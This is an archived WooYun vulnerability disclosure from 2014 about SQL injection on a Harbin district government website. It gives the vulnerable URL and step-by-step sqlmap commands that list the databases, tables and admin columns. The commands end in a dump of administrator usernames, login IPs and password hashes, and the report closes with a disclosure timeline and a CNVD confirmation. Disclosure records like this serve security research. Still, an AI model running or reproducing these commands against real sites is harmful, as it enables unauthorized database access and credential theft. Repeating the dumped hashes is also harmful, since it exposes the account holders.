乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-11: 细节已通知厂商并且等待厂商处理中 2014-05-14: 厂商已经确认,细节仅向厂商公开 2014-05-24: 细节向核心白帽子及相关领域专家公开 2014-06-03: 细节向普通白帽子公开 2014-06-13: 细节向实习白帽子公开 2014-06-25: 细节向公众公开
哈尔滨南岗先锋网&MySQL注入导致数据库大量重要信息泄露
注入地址:
http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275
SQLMAP- -.获取一个数据库:
./sqlmap.py -u "http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275" --dbs
available databases [2]: [*] information_schema[*] ngxfw
获取数据库中的表:
./sqlmap.py -u "http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275" -D ngxfw --tables
[19 tables]+----------------+| admanager || admin || adtype || bigtype || city || comment || goodsattribute || goodsattrvalue || goodsorder || infoclass || infolist || mail_config || member || message || province || userip || webconfig || weblink || weblinktype |+----------------+
获取字段:
./sqlmap.py -u "http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275" -D ngxfw -T admin --columns
[8 columns]+------------+----------------------+| Column | Type |+------------+----------------------+| checkadmin | enum('true','false') || id | int(10) unsigned || levelarray | varchar(255) || levelname | char(30) || loginip | varchar(20) || logintime | char(20) || password | char(32) || username | char(30) |+------------+----------------------+
获取内容:
./sqlmap.py -u "http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275" -D ngxfw -T admin -C id,loginip,username,password --dump
[2 entries]+----+---------------+---------------+----------------------------------+| id | loginip | username | password |+----+---------------+---------------+----------------------------------+| 1 | 113.0.112.122 | zhongshen | a004c0bec4c5fcc51114a27b4895236a || 6 | 127.0.0.1 | zhongshenkeji | 594104dc8420b4bbc5b2cfd292ed92e9 |+----+---------------+---------------+----------------------------------+
OVER!还有很多,就不一一展示了~
:)
危害等级:高
漏洞Rank:10
确认时间:2014-05-14 18:17
CNVD确认并复现所述情况,已经转由CNCERT下发给黑龙江分中心处置。
暂无